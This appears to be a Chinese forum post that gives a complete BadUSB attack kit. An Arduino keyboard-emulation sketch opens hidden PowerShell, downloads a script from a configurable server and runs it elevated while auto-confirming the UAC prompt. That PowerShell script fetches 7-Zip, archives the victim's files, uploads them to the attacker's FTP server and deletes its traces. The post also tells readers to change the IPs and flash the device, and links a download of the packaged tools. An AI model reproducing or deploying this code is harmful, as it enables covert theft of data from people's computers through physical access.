2.[get.ps1](清除运行记录,下载服务器中的7z.dll / 7z.exe / get.bat到c盘到相应位置,处理c:\temp.bat为7z压缩为c:\Ram.7z,上传c:\Ram.7z到FTP服务器根目录下,删除所有下载的文件!!!一共需要改4处IP地址!!!)[该代码存放于服务器http根目录下记得设置FTP服务器密码为admin admin] - reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f;
- (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.dll','c:\7z.dll');
- (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.exe','c:\7z.exe');
- (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/get.bat','c:\Users\Public\get.bat');
- C:\Users\Public\get.bat;$array="";foreach($u in(get-content c:\temp.bat)){[array]$array +='c:\7z a -t7z c:\Ram.7z "'+$u+'"'};$array | Out-File -Encoding default c:\temp.bat;c:\temp.bat;
- $fileinf=New-Object System.Io.FileInfo("C:\Ram.7z");
- $ftp = [System.Net.FtpWebRequest] [System.Net.FtpWebRequest]::Create("ftp://192.168.1.1/"+$fileinf.name)
- $ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile
- $ftp.Credentials = new-object System.Net.NetworkCredential("admin","admin")
- $ftp.UseBinary = $true
- $ftp.UsePassive = $true
- $content = [System.IO.File]::ReadAllBytes($fileInf.fullname)
- $ftp.ContentLength = $content.Length
- $rs = $ftp.GetRequestStream()
- $rs.Write($content, 0, $content.Length)
- $rs.Close()
- $rs.Dispose()
- Remove-Item c:\temp.bat
- Remove-Item c:\Ram.*
- Remove-Item c:\7z.*
- Remove-Item c:\Users\Public\get.*
复制代码 3.[get.ino](以管理员权限下载get.ps1到本地c:\users\public目录!!!需要改1处IP地址!!!UAC闪过之后要记得拔出)[修改IP后直接刷入]
- void setup() {//初始化
- Keyboard.begin();//开始键盘通讯
- delay(5000);//延时
- Keyboard.press(KEY_LEFT_GUI);//win键
- delay(500);
- Keyboard.press('r');//r键
- delay(500);
- Keyboard.release(KEY_LEFT_GUI);
- Keyboard.release('r');
- Keyboard.press(KEY_CAPS_LOCK);
- Keyboard.release(KEY_CAPS_LOCK);
- delay(500);
- Keyboard.println("POWERSHELL -NOP");
- delay(800);
- Keyboard.println();
- delay(800);
- Keyboard.println("START-PROCESS -fILEpATH POWERSHELL \" -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;CD $ENV:PUBLIC;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE(\'HTTP://192.168.1.1/GET.PS1\',\'C:\\USERS\\PUBLIC\\GET.PS1\');./GET.PS1;EXIT\" -vERB RUNAS;EXIT");
- Keyboard.press(KEY_CAPS_LOCK);
- Keyboard.release(KEY_CAPS_LOCK);
- Keyboard.end();//结束键盘通讯
- }
- void loop()//循环
- {
- Keyboard.release(KEY_LEFT_ALT);
- Keyboard.press(KEY_LEFT_ALT);
- Keyboard.print('y');
- Keyboard.release(KEY_LEFT_ALT);
- Keyboard.release(KEY_LEFT_ALT);
- Keyboard.release(KEY_LEFT_ALT);
- Keyboard.release(KEY_LEFT_ALT);
- delay(50);
- }
复制代码 打包下载:链接: http://pan.baidu.com/s/1hsQ2db2 密码: wikz
|